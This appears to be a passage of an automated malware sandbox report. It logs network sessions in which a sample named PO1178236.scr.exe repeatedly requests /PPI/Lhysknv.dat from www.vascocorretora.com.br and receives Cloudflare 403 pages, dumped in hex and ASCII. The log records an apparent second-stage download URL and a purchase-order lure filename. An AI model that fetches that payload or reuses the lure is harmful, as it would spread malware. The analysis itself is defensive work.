69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c13dea6a43fb</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:36:11 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 33 64 65 61 36 61 34 33 66 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c13dea6a43fb',t:'MTczNjQwODE3MS4wMDAwMDA='};var a=doc
        2025-01-09 07:36:11 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        25192.168.2.949733188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:11 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:11 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:26 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=170npKSou8d8%2FaV4OgOPioOmt%2FLdrrxv82hmxrnZCTZAC066RDEYvqGsD9yjOjfRwCtwNfBbcBKZGlcijVivPvVnQae0ZiLrYhubsEEcWS9HU2%2BqrLght1WBJZZqrE2em3NNSMWFXBXIjdKn"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c141ba62423f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1628555&cwnd=237&unsent_bytes=0&cid=d1822a64953d9022&ts=148&x=0"
        2025-01-09 07:36:11 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:11 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:11 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:11 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 34 31 62 61 36 32 34 32 33 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c141ba62423f</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:11 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 34 31 62 61 36 32 34 32 33 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c141ba62423f',t:'MTczNjQwODE3MS4wMDAwMDA='};var a
        2025-01-09 07:36:11 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        26192.168.2.949734188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:12 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:12 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:27 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFHhcWDtZkI4fyTdnMCG559JvEy0mxTAQ4Ydv%2BpLE67Vn4LMM7xQ5%2BzkAKAKhTzujPzxXz%2B2Cczf2%2B0GDxmCbYnArnqS2M%2BJFmDi4lHqdNaxR1c9dgV%2BTpzALusgI8EWxlyR%2FDC5dvy1eWzv"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1456be8436c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2093&rtt_var=805&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1343764&cwnd=228&unsent_bytes=0&cid=41998e57e3cef6fd&ts=135&x=0"
        2025-01-09 07:36:12 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:12 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:12 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:12 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 34 35 36 62 65 38 34 33 36 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1456be8436c</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:12 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 34 35 36 62 65 38 34 33 36 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 69 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1456be8436c',t:'MTczNjQwODE3Mi4wMDAwMDA=
        2025-01-09 07:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        27192.168.2.949735188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:12 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:13 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:12 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:27 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGigMYZbJ0bjaNTIerg1OSk7k19OCU1gBKJnTfzJYDKdRQqKCQBUYv7Rc0s%2B%2FxszUXl0a6KQ%2BIDa1kG8AKadZFsyeXq%2B3tDrNUr5vS4IHUupfsrRG6ambMwb8rz3jin3Ox%2BDkmbiPxU5aYR0"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1492fdc7290-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2009&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1425085&cwnd=249&unsent_bytes=0&cid=6d75fe4df561976a&ts=148&x=0"
        2025-01-09 07:36:13 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:13 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:13 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:13 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 34 39 32 66 64 63 37 32 39 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1492fdc7290</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:13 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 34 39 32 66 64 63 37 32 39 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1492fdc7290',t:'MTczNjQwODE3Mi4wMDAwMDA='};v
        2025-01-09 07:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        28192.168.2.949736188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:13 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:13 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:13 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:28 GMT
